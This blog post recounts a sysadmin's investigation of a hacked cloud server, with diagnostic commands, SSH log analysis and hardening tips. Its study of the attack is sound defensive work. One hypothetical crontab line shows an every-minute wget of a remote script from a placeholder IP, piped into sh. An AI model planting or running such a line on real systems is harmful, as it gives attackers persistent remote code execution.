February 15, 2020

Server Got Hacked, Crontab Has Been Modified

A few days ago, a server used by my developer coworkers (let's call it server A) kept going down. Initially I assumed the cause was the server's very limited resources combined with the growing number of processes run by its applications.

When I checked the server's resources, it turned out that CPU usage had hit 100%.
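A quick way to see which process is responsible is to sort the process list by CPU usage. These are generic inspection commands, not the exact ones from the incident:

```shell
# List the five processes using the most CPU, highest first
# (the first line of output is the column header).
ps aux --sort=-%cpu | head -n 6
```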

Which process kept pushing CPU usage to 100%? On another server (call it server B) running the same application processes, CPU usage never reached 100%.

Okay, maybe server A was running some additional application, so I had to find it. I checked systemd: nothing. I checked the processes running under nohup: nothing either. Then I checked cron, and there it was: an extra job, scheduled to run every minute. I asked the developer team, and it turned out nobody had added it. That meant my server had been hacked.
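The search above boils down to checking the usual places a rogue process can be launched from. A generic sketch of those checks (not a complete list, and not the exact commands from the incident):

```shell
# Long-running systemd services (skipped silently if systemd is absent).
systemctl list-units --type=service --state=running 2>/dev/null || true

# Jobs started with nohup show up as ordinary processes re-parented to
# PID 1 once their shell exits, so look for those.
ps -eo pid,ppid,cmd | awk '$2 == 1' | head || true

# Per-user and system-wide cron entries.
crontab -l 2>/dev/null || echo "(no user crontab)"
cat /etc/crontab 2>/dev/null || true
ls /etc/cron.d /etc/cron.hourly /etc/cron.daily 2>/dev/null || true
```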

Here is what the cron entry the attacker added was doing:


Every minute, the job downloaded an sh file and then executed it. No wonder the server kept going down. When I copied the entry into the Google search engine, it turned out that many people had had their cron hacked the same way. For roughly 80% of them, opening the link showed that the downloaded script started a mining process. But when I opened the link from my server, it was already dead, so I couldn't tell what actually ran after the bash file was downloaded.
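For illustration only, a malicious cron entry of this kind typically looks like the following. The schedule is the one described above, but the URL and filename are made up; the attacker's actual entry is not reproduced here:

```
# HYPOTHETICAL crontab entry (every minute: download a script and pipe it
# into a shell). The IP/URL below is fabricated for illustration.
* * * * * wget -q -O - http://198.51.100.1/update.sh | sh >/dev/null 2>&1
```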

So where did the attacker get in to be able to modify the cron file? The answer to that question is still gray, or in other words unclear. In the forums I found through Google that discuss this case, nobody has pinpointed the entry point either.

But when I checked the authentication log on server A, it turned out the server was also being brute-forced over SSH. And here is the interesting part: server A had been under brute force for days 🤣🤣🤣. No wonder it kept going down: a process running every minute, plus an ongoing brute force 🤣

Btw, I found the brute force while checking the /var/log/auth.log file. Checking when the brute force started also told me when the cron file had been modified (that is, when the cron script I described above was put onto the server). The cron entry was added the day after the brute force began, and the brute force itself started just a few minutes after the server was created. Btw, server A was created on one of the cloud services.
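Spotting a brute force in the auth log mostly means counting failed logins per source IP. The pipeline below runs on a few made-up sample lines in the usual sshd log format (the IPs come from documentation ranges, not real attackers); on a real server you would point it at /var/log/auth.log instead:

```shell
# Made-up sample auth.log lines, for demonstration only.
cat > /tmp/auth.sample <<'EOF'
Feb 10 03:12:01 server-a sshd[1301]: Failed password for root from 203.0.113.7 port 51514 ssh2
Feb 10 03:12:03 server-a sshd[1302]: Failed password for invalid user admin from 203.0.113.7 port 51520 ssh2
Feb 10 03:12:05 server-a sshd[1303]: Failed password for root from 198.51.100.23 port 40100 ssh2
EOF

# Count failed SSH logins per source IP, most aggressive IP first.
grep 'Failed password' /tmp/auth.sample \
  | grep -oE 'from ([0-9]{1,3}\.){3}[0-9]{1,3}' \
  | awk '{print $2}' \
  | sort | uniq -c | sort -rn
```

The first output line also gives a rough timestamp range for when the attack began, which is how the cron modification date was correlated here.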

About 90% of the articles I read on this case recommend reinstalling the server's operating system.
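Reinstalling removes the payload, but the SSH entry point should be closed too. A minimal /etc/ssh/sshd_config sketch, assuming key-based login is already set up and working (verify that before applying, or you will lock yourself out):

```
# /etc/ssh/sshd_config (fragment) -- hardening sketch, not a full config.
PasswordAuthentication no         # no passwords, so password brute force is pointless
PermitRootLogin prohibit-password # root may log in with a key only
MaxAuthTries 3                    # drop the connection after 3 failed attempts
```

A tool like fail2ban, which bans IPs after repeated failed logins, also helps against this kind of sustained brute force.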

Maybe that’s all I want to convey through this article. If anyone wants to share about this issue, please leave a comment 😁